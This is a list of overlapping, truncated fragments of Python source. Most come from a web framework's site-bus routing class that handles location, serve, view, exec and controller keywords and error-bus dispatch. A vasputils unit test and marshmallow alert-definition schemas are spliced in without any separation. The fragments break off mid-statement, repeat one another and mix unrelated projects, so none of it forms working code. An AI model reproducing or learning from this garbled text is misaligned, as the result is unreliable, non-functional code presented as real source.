__configure_componentbus(self, conffilename, component, path = None, busname = 'componentbus'): '''", "be None as location can be default sitebus item too ''' from ._stsvcsb_location", "path = None, buffersize = 64*1024): ''' Config keyword - serve ''' from", "in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'):", "ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru", "import ErrorBus self.ErrorBus = ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename,", "for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not None)", "bus item is already configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is", "iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems", "= functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var,", "ctx, path): ''' Entry point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS", "'%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s' is already", "functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path", "def BusVar(name, default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val =", "None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not found:", "self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var'", "(self.RootDir)) self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key]", "IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change", "self.CrossroadBusItems = {} #Check path against this, if ok, call item from that", "is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem = createitemfnct()", "'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' : self.__configure_controller, 'componentbus'", ": self.__configure_var, 'serve' : self.__configure_serve, 'view' : self.__configure_view, 'exec' : self.__configure_exec, 'controller' :", "be default sitebus item too ''' from ._stsvcsb_location import Location l = self._InsertBusItem(path,", "= None, buffersize = 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve", "epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during bus processing (you should use StrigaBusError", "index = None, rootdir = '.'): ''' @param path - can be None", "if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default, ctx, path): if len(path) ==", "if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '':", "not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue)", "as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$')", "striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for '%s'", "pattern, path = None, buffersize = 64*1024): ''' Config keyword - serve '''", "from ._stsvcsb_view import View self._InsertBusItem(path, functools.partial(View, self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self,", "source, mode, path = None, entry='main', pathlimit='==0'): ''' Config keyword - view '''", "self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root directory is", "def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None, pathlimit = '==0',", "= '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir", "ibm in self.IntroBusItems: ibm(ctx, path) #Check again as IntroBusItems can change path array", "not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStop'):", "default, ctx, path): if len(path) == 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if", "is None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] =", "IntroBusItems can change path array if len(path) == 0: if self.Index is not", "rootdir = '.'): ''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller", "conffilename, component, path = None, busname = 'componentbus'): ''' Config keyword - componentbus", "from ._stsvcsb_location import Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return", "SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx,", "import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE = re.compile(r'^[^//]*$') def __init__(self):", "self.RootDir, source, mode, entry, pathlimit)) def __configure_componentbus(self, conffilename, component, path = None, busname", "if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for bm in self.CrossroadBusItems.itervalues():", "item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs =", "are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue =", "% (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" % (self.RootDir)) self.Index", "self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0):", "bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path", "path = None, pathlimit = '==0', rootdir = '.'): ''' Config keyword -", "epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False except: L.exception(\"Exception during error bus", "return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default =", "pathlimit = '==0', rootdir = '.'): ''' Config keyword - exec ''' from", "bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name, default,", "configured!\") self.DefaultBusItem = createitemfnct() return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path", "fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' :", "from ._stsvcsb_exec import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry,", "{0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections", "_InsertBusItem(self, path, createitemfnct): if path is None: if self.DefaultBusItem is not None: raise", "source, entry, pathlimit)) def __configure_controller(self, conffilename, source, controllerclass = 'Controller', path = None,", "bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if (self.DefaultBusItem is not", "def __init__(self): self.IntroBusItems = [] #Iterate thru this (call each) in the begining", "= {} #Check path against this, if ok, call item from that self.DefaultBusItem", "self.CrossroadBusItems[path] = nbi return nbi def _configure(self, conffilename, index = None, rootdir =", "= nbi return nbi def _configure(self, conffilename, index = None, rootdir = None):", "else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for", "self.Index = index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] =", "#Check path against this, if ok, call item from that self.DefaultBusItem = None", "None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import View", "- Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir, rootdir) nbi =", "rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self,", "item root directory is not directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root", "bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try:", "== 0: raise striga.core.exception.StrigaBusError('NotFound') val = path.pop(0) if val == '': val =", "None) if bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site", "= None, entry='main', pathlimit='==0'): ''' Config keyword - view ''' from ._stsvcsb_view import", "self.DefaultBusItem.BusStart() if self.ErrorBus is not None: self.ErrorBus.BusStart() def BusStop(self): if self.ErrorBus is not", "path = None, index = None, rootdir = '.'): ''' @param path -", "hasattr(bm, 'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def", "self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path = None,", "is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already", "if bm is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus", "bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if", "(call each) in the begining self.CrossroadBusItems = {} #Check path against this, if", "when not found anything in self.CrossroadBusItems self.RootDir = None self.Index = None self.ErrorBus", "path, createitemfnct): if path is None: if self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default", "logging as L import striga.core.exception ### class Bus(object): CustomSiteBusDefs = {} PathCheckRE =", "self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir = None", "self try: #First iterate thru IntroBusItems for ibm in self.IntroBusItems: ibm(ctx, path) #Check", "if ok, call item from that self.DefaultBusItem = None #Call when not found", "rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def __configure_controller(self, conffilename,", "is not None: if isinstance(ctx.err.excvalue, striga.core.exception.StrigaBusError): epath = ctx.err.excvalue.Name else: L.exception(\"Generic exception during", "name, default)) def __configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): '''", "SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for ibm", "ctx.err.excvalue = sys.exc_info()[:2] prev_excvalue = copy.copy(ctx.err.excvalue) if self.ErrorBus is not None: if isinstance(ctx.err.excvalue,", "index defs = {} for key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self)", "has already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus =", "= 64*1024): ''' Config keyword - serve ''' from ._stsvcsb_serve import Serve self._InsertBusItem(path,", "None: L.warning(\"Site bus path not found: {0}\".format(path)) raise striga.core.exception.StrigaBusError('NotFound') else: ctx.req.Vars.SITEBUS['LastPath'] = path.pop(0)", "pathlimit)) return nbi._configure(conffilename = conffilename) def _configure_finished(self): pass def __call__(self, ctx, path): '''", "Location l = self._InsertBusItem(path, Location) rootdir = os.path.join(self.RootDir, rootdir) return l._configure(conffilename = conffilename,", "directory: '%s'\" % (self.RootDir)) else: L.warning(\"Bus item root directory doesn't exist: '%s'\" %", "ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location'] = self try: #First iterate thru IntroBusItems for", "in self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'):", "__configure_serve(self, conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword -", "in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0], None) if bm is None: bm", "configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return nbi def _configure(self,", "exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} for key, fn", "= os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir)) if not os.path.isdir(self.RootDir): if os.path.exists(self.RootDir): L.warning(\"Bus item root", "Serve self._InsertBusItem(path, functools.partial(Serve, self.RootDir, pattern, buffersize)) def __configure_view(self, conffilename, source, mode, path =", "'BusStop'): bm.BusStop() for bm in self.IntroBusItems: if hasattr(bm, 'BusStop'): bm.BusStop() ### def BusVar(name,", "begining self.CrossroadBusItems = {} #Check path against this, if ok, call item from", "= '.'): if self.ErrorBus is not None: L.warning(\"Bus item has already one errorbus", "raise prev_excvalue else: raise def BusStart(self): for bm in self.IntroBusItems: if hasattr(bm, 'BusStart'):", "path - can be None as location can be default sitebus item too", "(you should use StrigaBusError exceptions)\") epath = str(ctx.err.exctype) try: self.ErrorBus(ctx, epath) return False", "= conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar,", "''' Config keyword - Controller ''' from ._stsvcsb_cntrlr import Controller rootdir = os.path.join(self.RootDir,", "os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir) def __configure_var(self, conffilename, name,", "in the begining self.CrossroadBusItems = {} #Check path against this, if ok, call", "in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus,", "directory doesn't exist: '%s'\" % (self.RootDir)) self.Index = index defs = {} for", "that self.DefaultBusItem = None #Call when not found anything in self.CrossroadBusItems self.RootDir =", "path.pop(0) bm(ctx, path) except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise", "conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def __configure_serve(self, conffilename, pattern, path", "source, entry, path = None, pathlimit = '==0', rootdir = '.'): ''' Config", "= rootdir) def __configure_var(self, conffilename, name, default = 0): self.IntroBusItems.append(functools.partial(BusVar, name, default)) def", "if len(path) == 0: if self.Index is not None: path.append(self.Index) else: raise striga.core.exception.StrigaBusError(\"NotFound\")", "self) defs.update({ 'location' : self.__configure_location, 'errorbus' : self.__configure_errorbus, 'var' : self.__configure_var, 'serve' :", "self.DefaultBusItem is not None: raise striga.core.exception.StrigaConfigurationError(\"Default bus item is already configured!\") self.DefaultBusItem =", "already one errorbus defined - overwriting\") from ._stsvcsb_errorbus import ErrorBus self.ErrorBus = ErrorBus()", "return self.DefaultBusItem if self.PathCheckRE.match(path) is None: raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path)", "None as location can be default sitebus item too ''' from ._stsvcsb_location import", "import Exec rootdir = os.path.join(self.RootDir, rootdir) self._InsertBusItem(path, functools.partial(Exec, rootdir, source, entry, pathlimit)) def", "L.exception(\"Exception during error bus processing:\") raise prev_excvalue else: raise def BusStart(self): for bm", "if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart() if", "the begining self.CrossroadBusItems = {} #Check path against this, if ok, call item", "rootdir = None): if rootdir is None: rootdir = os.path.dirname(conffilename) self.RootDir = os.path.normpath(os.path.abspath(rootdir))", "'%s' is already configured!\" % path) nbi = createitemfnct() self.CrossroadBusItems[path] = nbi return", "is None: bm = self.DefaultBusItem if bm is None: L.warning(\"Site bus path not", "not None: self.ErrorBus.BusStop() if (self.DefaultBusItem is not None) and hasattr(self.DefaultBusItem, 'BusStop'): self.DefaultBusItem.BusStop() for", "def __configure_errorbus(self, conffilename, rootdir = '.'): if self.ErrorBus is not None: L.warning(\"Bus item", "self.IntroBusItems: if hasattr(bm, 'BusStart'): bm.BusStart() for bm in self.CrossroadBusItems.itervalues(): if hasattr(bm, 'BusStart'): bm.BusStart()", "else: raise striga.core.exception.StrigaBusError(\"NotFound\") #Then find item in CrossroadBusItems & DefaultBusItem bm = self.CrossroadBusItems.get(path[0],", "conffilename, pattern, path = None, buffersize = 64*1024): ''' Config keyword - serve", "except striga.core.exception._StrigaClientRedirectBase: # Redirections are not solved thru ErrorBus raise except: ctx.err.exctype, ctx.err.excvalue", "raise striga.core.exception.StrigaConfigurationError(\"Invalid path '%s' given!\" % path) if self.CrossroadBusItems.has_key(path): raise striga.core.exception.StrigaConfigurationError(\"Bus item for", "point to this bus object ''' SiteBusVar = ctx.req.Vars.SITEBUS SiteBusVar['RootDir'] = self.RootDir SiteBusVar['Location']", "key, fn in self.CustomSiteBusDefs.iteritems(): defs[key] = functools.partial(fn, self) defs.update({ 'location' : self.__configure_location, 'errorbus'", "= ErrorBus() rootdir = os.path.join(self.RootDir, rootdir) return self.ErrorBus._configure(conffilename = conffilename, rootdir = rootdir)" ]
[ "class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0, 1.0, 1.2])", "import unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0", "import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0,", "unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0", "from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value, [0.0, 1.0,", "vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>') self.assertTrue(v.value,", "from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v = from_string('<v>0.0 1.0 1.2</v>')", "<reponame>akiraakaishi/vasputils import unittest from vasputils.vasprun import from_string class VectorTest(unittest.TestCase): def test_parse(self): v =" ]
[ "= fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr", "return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if", "alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True)", "obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs):", "Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system =", "API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs", "= fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True)", "None: data[\"value\"] = str(data[\"value\"]) return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid =", "\"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of", "class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric =", "= fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True)", "fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs): value = data.get(\"value\",", "Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta", "_get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict,", "Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for", "fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric", "if obj.job: return obj.job.tracking_source return obj.tracking_source @pre_load def prepere(self, data: dict, **kwargs): value", "prepere(self, data: dict, **kwargs): value = data.get(\"value\", None) if value is not None:", "fields.Str(allow_none=True) custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True)", "get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if obj.job: return obj.job.tracking_source return obj.tracking_source", "owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True)", "= fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description =", "fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True) task_name = fields.Str(allow_none=True) custom_name =", "fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter stats by operation_type", "by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def:", "= fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id =", "fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True)", "# -------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to", "the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner", "airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs = fields.Bool() alert_group_uid", "class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True) type = fields.Str(required=True) user_metric = fields.Str() operator =", "stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used", "fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name", "# Used only used by the UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system", "-------------------------------------- dataset_uid = fields.Str(allow_none=True) # Operation type (e.g. \"read\", \"write\", None=any) to filter", "custom_name = fields.Str(allow_none=True) original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description", "GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True)", "to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in", "= fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator =", "fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\",", "Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name = fields.Str(attribute=\"job.project.name\") alert_on_historical_runs =", "of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True)", "get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env def _get_tracking_source_instance(self, obj): if", "# TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id = fields.Int(attribute=\"job.project_id\") project_name =", "return data class GroupAlertDefsSchema(ApiStrictSchema): type = fields.Str(required=True) tracking_source_uid = fields.UUID(required=True) severity = fields.Str(required=True)", "alert_on_historical_runs = fields.Bool() alert_group_uid = fields.Str(allow_none=True) uid = fields.Str(allow_none=True) value = fields.Str(allow_none=True) job_id", "fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert,", "value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True)", "import fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema):", "fields, pre_load class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity", "= fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\")", "fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name = fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API:", "alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self,", "seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name = fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(),", "job_id = fields.Int(allow_none=True) summary = fields.Str(allow_none=True) job_name = fields.Str(attribute=\"job.name\", allow_none=True) task_repr = fields.Str(allow_none=True)", "by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to", "filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web.", "Operation type (e.g. \"read\", \"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True)", "UI affected_datasets = fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner ==", "fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name", "fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description", "= fields.Str(allow_none=True) datasets_uids = fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # --------------------------------------", "\"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj): return self._get_tracking_source_instance(obj).env", "= fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner = fields.Str(allow_none=True) jobs", "fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert", "fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) owner =", "operation_type = fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build", "fields.Str(allow_none=True) # Type of MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules", "class MLAlert(ApiStrictSchema): sensitivity = fields.Float() look_back = fields.Integer() class AlertDefsSchema(ApiStrictSchema): severity = fields.Str(required=True)", "original_uid = fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert", "fields.Method(\"get_tracking_source_name\") env = fields.Method(\"get_tracking_source_env\") # TODO_CORE: API: Deprecate airflow_server_info airflow_instance_name = fields.Method(\"get_tracking_source_name\") project_id", "fields.Str(allow_none=True) advanced_json = fields.Str(allow_none=True) scheduled_job_uid = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert,", "fields.List(fields.Str(), allow_none=True) # Fields for OperationColumnStatAdvancedAlert alert # -------------------------------------- dataset_uid = fields.Str(allow_none=True) #", "= fields.List(fields.Dict(), allow_none=True, dump_only=True) is_system = fields.Function( lambda alert_def: alert_def.owner == \"system\", dump_only=True,", "operator = fields.Str() is_str_value = fields.Bool() created_at = fields.DateTime() scheduled_job_name = fields.Str(attribute=\"scheduled_job.name\") source_instance_name", "fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) #", "\"write\", None=any) to filter stats by operation_type = fields.Str(allow_none=True) # Type of MetricRule,", "alert_def.owner == \"system\", dump_only=True, ) def get_tracking_source_name(self, obj): return self._get_tracking_source_instance(obj).name def get_tracking_source_env(self, obj):", "DatasetSlaAlert/DatasetSlaAdvancedAlert alert # -------------------------------------- seconds_delta = fields.Int(allow_none=True) # Converts to datetime.timedelta dataset_partial_name =", "allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def prepere(self, data: dict, **kwargs):", "= fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) ml_alert = fields.Nested(MLAlert, allow_none=True) # Fields for DatasetSlaAlert/DatasetSlaAdvancedAlert", "fields.UUID(required=True) severity = fields.Str(required=True) user_metric = fields.Str(required=True) value = fields.Str(allow_none=True) operator = fields.Str(allow_none=True)", "fields.Str(allow_none=True) jobs = fields.List(fields.Int(), allow_none=True) custom_name = fields.Str(allow_none=True) custom_description = fields.Str(allow_none=True) @pre_load def", "found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), allow_none=True) # Used", "MetricRule, found in dbnd_web. Used to build advanced_json metrics_rules = fields.List(fields.Dict(), 